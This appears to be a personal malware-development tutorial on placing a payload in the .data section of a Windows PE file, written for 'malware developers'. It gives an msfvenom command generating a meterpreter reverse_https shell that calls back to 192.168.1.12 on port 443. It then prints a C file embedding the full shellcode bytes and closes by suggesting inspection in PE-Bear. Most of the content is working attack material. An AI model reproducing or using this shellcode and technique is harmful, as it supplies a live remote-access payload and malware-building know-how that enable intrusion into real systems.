Payload Placement - .data & .rdata Sections

In the Portable Executable file structure (PE) we malware developers have a some options to where to store there payload

rsrc section
data section
rdate (Read Only) section
text section

Payload Placement in .data Section

What is Data Section in the PE File Structure?

Contains Initialized data of the application such as strings data
Contains Global Variables of the application
The section is Readable and Writable so that will help Malware Developer In the payload encryption and decryption phase

First let’s Generate the payload from Msfvenom

msfvenom -p windows/meterpreter/reverse_https LHOST=192.168.1.12 LPORT=443 -f c -v shellcode -b "\x00"

Now Let’s write a C Code that will store the Malicious payload in the .data secretion in the PE Structure

#include <stdio.h>
#include <Windows.h>
// Hello I'm the payload nice to meet you!
// I'm stored at the Data Section Here!
// msfvenom -p windows/meterpreter/reverse_https LHOST=192.168.1.12 LPORT=443 -f c -v shellcode -b "\x00"
unsigned char shellcode[] =
"\xb8\xc9\xe3\x83\xe1\xdb\xcc\xd9\x74\x24\xf4\x5a\x31\xc9"
"\xb1\x8a\x83\xc2\x04\x31\x42\x10\x03\x42\x10\x2b\x16\x7f"
"\x09\x24\xd9\x80\xca\x5a\xeb\x52\x43\x7f\x6f\xd8\x06\x4f"
"\xfb\x8c\xaa\x24\xa9\x24\xbc\x8d\x04\x63\xf3\x0e\x13\x19"
"\xdb\xc1\xe4\x72\x27\x40\x99\x88\x74\xa2\xa0\x42\x89\xa3"
"\xe5\x14\xe7\x4c\xbb\x2d\x55\x82\xb7\x70\x66\xa3\x17\xff"
"\xd6\xdb\x12\xc0\x80\x6f\x51\xc0\xfe\x04\x31\xe2\xff\xc9"
"\x49\xaa\xe7\xbd\xc8\xe2\x6c\x01\xe2\x0b\xc5\xf2\x30\x7f"
"\xd7\xd2\x08\xbf\x19\x15\x67\x93\x9b\x6e\x40\x0b\xee\x84"
"\xb2\xb6\xe9\x5f\xc8\x6c\x7f\x7f\x6a\xe6\x27\x5b\x8a\x2b"
"\xb1\x28\x80\x80\xb5\x76\x85\x17\x19\x0d\xb1\x9c\x9c\xc1"
"\x33\xe6\xba\xc5\x18\xbc\xa3\x5c\xc5\x13\xdb\xbe\xa1\xcc"
"\x79\xb5\x40\x1a\xfd\x36\x9b\x23\xa3\xa0\x0a\xb9\x28\x30"
"\xbb\x36\xb8\x5e\x52\xed\x52\xd2\xd3\x2b\xa4\x15\xce\x05"
"\x71\xba\xa2\x36\xd6\x6f\xad\xca\xd8\x8f\x2d\x60\xb6\xf5"
"\x44\x16\x24\x68\xb8\xd3\x9a\x5a\xe6\x33\xae\xfb\x85\x2a"
"\x5e\x8f\x26\xde\xf6\x54\x99\x69\x69\xde\xbc\x05\x55\x53"
"\x5e\xb5\xb5\x24\xf3\x19\xee\x9a\xc2\x6a\x51\xeb\x0d\xad"
"\x2c\x7b\x3e\xc1\xcb\x2c\xdb\x7b\x5f\xbb\x57\x53\x69\x0b"
"\xad\x85\xa4\x45\xfc\xec\xe6\xb1\xb5\x46\xb3\x8c\x05\x7b"
"\x1b\x62\xff\xe8\x3e\x5a\xb8\x8b\xa3\xf1\x29\x7d\x04\x53"
"\xd3\x0f\x37\x32\x74\x9e\x98\xf5\xbc\x70\xd6\xd5\x93\xed"
"\x7e\x74\x66\x87\x51\x40\xb6\x62\x80\x9d\x98\xbd\xe9\xdd"
"\x8c\x87\x47\xa4\xeb\x07\xb2\x05\xa7\x9d\x3e\xfa\x14\x0a"
"\xfa\xfd\x9a\xca\x14\x36\x9a\xca\xe4\xe7\xee\xae\xa7\x8d"
"\x4f\x4c\x44\x06\x40\xa2\xd1\x8c\xcc\x80\xa0\x1a\x68\x36"
"\x04\xc3\x43\x5f\xd3\x47\x9c\xf5\x6b\x2e\x94\x67\x38\xd6"
"\x69\x2e\xa7\x57\x33\x94\x6b\x0d\xda\x70\x3a\xe5\x2a\xb2"
"\x88\x7c\x2b\xf1\x6b\x24\x8a\xb6\x30\xe0\x55\x7f\xb7\x40"
"\x0e\x28\x3e\xff\x08\x29\x95\x76\x52\x85\x7e\x88\x69\xc2"
"\xfb\xdb\xde\x41\x53\x88\xb6\x0d\xb0\x7b\x19\xf5\xb9\x56"
"\xf3\x63\x4c\x07\x94\xf3\x63\xb7\x64\x7d\x63\xdd\x60\x2d"
"\x0e\x3e\x3f\xa5\xbb\x06\x21\xb3\xbb\x53\x0e\xef\x10\x08"
"\xe7\x67\xba\xa8\x1f\x03\x3b\x61\x9a\x33\xb6\x9d\xcd\x3b"
"\x2a\x9d\x0d\x54\x09\x6d\x38\x44\x6e\x58\x0c\xf1\x5c\x8a"
"\xda\xf9\x5e\x4a\xb7\xb9\x36\x4a\x57\x3a\xc7\x22\x57\x3a"
"\x87\xb2\x04\x52\x5f\x16\xf9\x47\xa0\x83\x6d\xd4\x0c\xa2"
"\x75\x8c\xda\xb4\x59\x33\x1b\xe7\xcf\x5b\x09\x91\x79\x79"
"\xd2\x48\xfc\xbe\x59\xbd\x74\x39\xa3\x82\x0e\x86\xd6\xe1"
"\x49\xc4\x46\x01\x02\x35\x87\x2e\xe4\xf0\x4a\xfe\x36\x35"
"\x93\xd0\x09\x17\xd2\x1e\x6a\xdc\xe4\xeb\xc8\x74\x6f\x13"
"\x5e\x86\xba";
int main()
{
    printf("Rem01x Malware Development Journey\n");
    printf("Hello I'm the Paylaod my address is: 0x%p", shellcode);
    return EXIT_SUCCESS;
}

Now let’s compile the code and open it in the PE-Bear to have a look at the .data Section